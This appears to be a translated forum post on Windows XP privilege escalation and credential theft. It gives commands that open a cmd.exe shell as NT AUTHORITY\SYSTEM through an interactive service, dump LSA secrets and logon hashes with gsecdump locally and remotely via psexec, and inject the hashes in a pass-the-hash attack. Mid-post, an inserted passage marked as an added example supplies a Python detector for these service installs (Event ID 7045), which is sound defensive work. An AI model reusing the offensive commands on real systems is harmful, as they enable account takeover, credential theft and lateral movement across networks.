To get a DOS prompt as NT SYSTEM:

C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
[SC] CreateService SUCCESS

C:\>sc start shellcmdline
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.

C:\>sc delete shellcmdline
[SC] DeleteService SUCCESS
------------

Then in the new DOS window:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
NT AUTHORITY\SYSTEM

C:\WINDOWS\system32>gsecdump -h
gsecdump v0.6 by Johannes Gumbel (johannes.gumbel@truesec.se)
usage: gsecdump [options]

options:
-h [ --help ] show help
-a [ --dump_all ] dump all secrets
-l [ --dump_lsa ] dump lsa secrets
-w [ --dump_wireless ] dump microsoft wireless connections
-u [ --dump_usedhashes ] dump hashes from active logon sessions
-s [ --dump_hashes ] dump hashes from SAM/AD
Although I like to use:

PsExec v1.83 - Execute processes remotely
Copyright (C) 2001-2007 Mark Russinovich
Sysinternals - www.sysinternals.com

C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT

to get the hashes from active logon sessions of a remote system.

These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.
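Both tricks above leave the same trace on the box: a "service installed" record (System log, Event ID 7045), once for the hand-made shellcmdline service whose binary is cmd.exe marked interactive, and once for the PSEXESVC service that PsExec drops when it runs something with -s. The following is an added defender-side example, not code from the post or from the truesec blog it quotes. It assumes a simplified key=value export of 7045 records (a constructed format, not a real evtx dump) and flags the two patterns shown in the post; the sample events are made up to mirror the commands above.

```python
"""
Defender-side triage of Windows "service installed" events (System log,
Event ID 7045).  A service created with `sc create ... binpath= cmd.exe
type= interact`, or the PSEXESVC service that PsExec installs, both leave
a 7045 record; this script flags such records.  The log format below is a
constructed, simplified key=value form, not a real export.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# One constructed event per line (hypothetical format; values chosen to
# mirror the commands shown in the post).
SAMPLE_EVENTS = r"""
EventID=7045 ServiceName=shellcmdline ImagePath="C:\WINDOWS\system32\cmd.exe /K start" ServiceType="interactive process" StartType="demand start" Account=LocalSystem
EventID=7045 ServiceName=PSEXESVC ImagePath="%SystemRoot%\PSEXESVC.EXE" ServiceType="user mode service" StartType="demand start" Account=LocalSystem
EventID=7045 ServiceName=Spooler ImagePath="C:\WINDOWS\system32\spoolsv.exe" ServiceType="user mode service" StartType="auto start" Account=LocalSystem
EventID=7036 ServiceName=Spooler State=running
"""

# key=value pairs; values may be double-quoted when they contain spaces.
KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')
# First path component that looks like an executable name.
BASENAME_RE = re.compile(r'([^\\/"]+\.(?:exe|com))', re.IGNORECASE)

# Binaries that are command interpreters rather than real service hosts.
SHELL_BINARIES = {"cmd.exe", "command.com"}
# Service name / binary left behind by PsExec-style remote execution.
REMOTE_EXEC_MARKERS = {"psexesvc", "psexesvc.exe"}


@dataclass
class Finding:
    service: str
    image_path: str
    reasons: List[str] = field(default_factory=list)


def parse_event(line: str) -> dict:
    """Parse one key=value record; surrounding quotes are stripped from values."""
    return {k: v.strip('"') for k, v in KV_RE.findall(line)}


def image_basename(image_path: str) -> str:
    """Lower-cased executable name from an ImagePath, ignoring arguments
    and directories with spaces (e.g. "C:\\Program Files\\x\\y.exe" -arg)."""
    m = BASENAME_RE.search(image_path)
    return m.group(1).lower() if m else ""


def inspect_event(ev: dict) -> Optional[Finding]:
    """Return a Finding for a suspicious 7045 record, else None."""
    if ev.get("EventID") != "7045":
        return None
    name = ev.get("ServiceName", "")
    path = ev.get("ImagePath", "")
    base = image_basename(path)
    reasons = []
    if base in SHELL_BINARIES:
        reasons.append("service binary is a command interpreter")
    if "interactive" in ev.get("ServiceType", "").lower():
        reasons.append("service is marked interactive (desktop process as SYSTEM)")
    if name.lower() in REMOTE_EXEC_MARKERS or base in REMOTE_EXEC_MARKERS:
        reasons.append("PsExec remote-execution service")
    return Finding(name, path, reasons) if reasons else None


def analyze(log_text: str) -> List[Finding]:
    """Run inspect_event over every non-empty line of a log dump."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        f = inspect_event(parse_event(line))
        if f:
            findings.append(f)
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"{f.service}: {f.image_path}")
        for r in f.reasons:
            print(f"  - {r}")
```

Run on the sample, shellcmdline is reported twice over (interpreter as service binary, interactive type) and PSEXESVC once, while the Spooler install and the unrelated 7036 state-change record pass through. In practice the same three checks are what you would express in whatever SIEM rule language you use; the point is that an interactive cmd.exe service or a PSEXESVC install is a rare enough event on a healthy host to be worth an alert on its own.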
A tip: you can use iam from the pshtools package to import the hash information just grabbed with gsecdump into the local lsass process and carry out a hash-injection attack. Those foreigners really are good; the administrators will be kept busy now. The LM/NT hashes obtained during ARP spoofing, and the ones obtained with gethash, actually never need the password cracked at all; this is purely a matter of using the tool. As the original article puts it, no matter whether the password is 4 characters or 127, once you have the hash it is 100% done.
Original source: http://truesecurity.se/blogs/mur ... -text-password.aspx

I looked at the original source; it seems to be from /2007/03/16/. Depressing, what a gap.